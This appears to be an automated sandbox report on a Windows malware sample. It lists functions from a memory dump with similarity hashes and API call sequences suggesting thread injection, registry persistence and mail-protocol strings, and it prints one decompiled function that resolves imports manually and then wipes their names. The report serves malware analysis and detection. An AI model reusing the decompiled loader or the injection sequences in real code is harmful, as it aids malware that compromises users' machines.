  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF75B, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 172 Total matches: 23string
Similarity
  • Total matches: 23
  • API ID: LocalFreelstrcatlstrcpymemcpy
  • String ID: IMAP$P$POP3$SMTP
  • API String ID: 2001391702-3667654339
  • Opcode ID: 43434d26df3a4f5d7c34ecf30ecc38ca90c9099c92fdaea40e4787011e532f06
  • Instruction ID: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
  • Opcode Fuzzy Hash: 3911AF310449E3F79AAB229950026AB81429F117E2E5C9B21ED7C785CF6F03B14B770D
  • Instruction Fuzzy Hash: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
APIs
  • lstrcpyW.KERNEL32(00000000,001ED5A0), ref: 001DF84B
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001DF853
  • memcpy.NTDLL(00000000,?,00000000,-00000002), ref: 001DF8F1
  • LocalFree.KERNEL32(?,-00000002), ref: 001DF908
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001D93F1: lstrlenW.KERNEL32(00000000,00000000,001EAC44), ref: 001D9401
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DAFC4, Relevance: 13.8, APIs: 9, Instructions: 278 Total matches: 59memorythread
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAC3A, Relevance: 13.6, APIs: 9, Instructions: 124 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB593, Relevance: 13.6, APIs: 9, Instructions: 115 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4CEB, Relevance: 13.6, APIs: 9, Instructions: 94 Total matches: 33filememorystring
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C164D, Relevance: 13.6, APIs: 9, Instructions: 89 Total matches: 49memoryregistrystring
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB978, Relevance: 13.6, APIs: 9, Instructions: 82 Total matches: 110file
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DC371, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109 Total matches: 97threadsynchronizationinjection
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3996, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105 Total matches: 51registryfilememory
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 001C1B85, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79 Total matches: 31memoryfilestring
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C27F6, Relevance: 12.1, APIs: 8, Instructions: 52 Total matches: 80registry
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
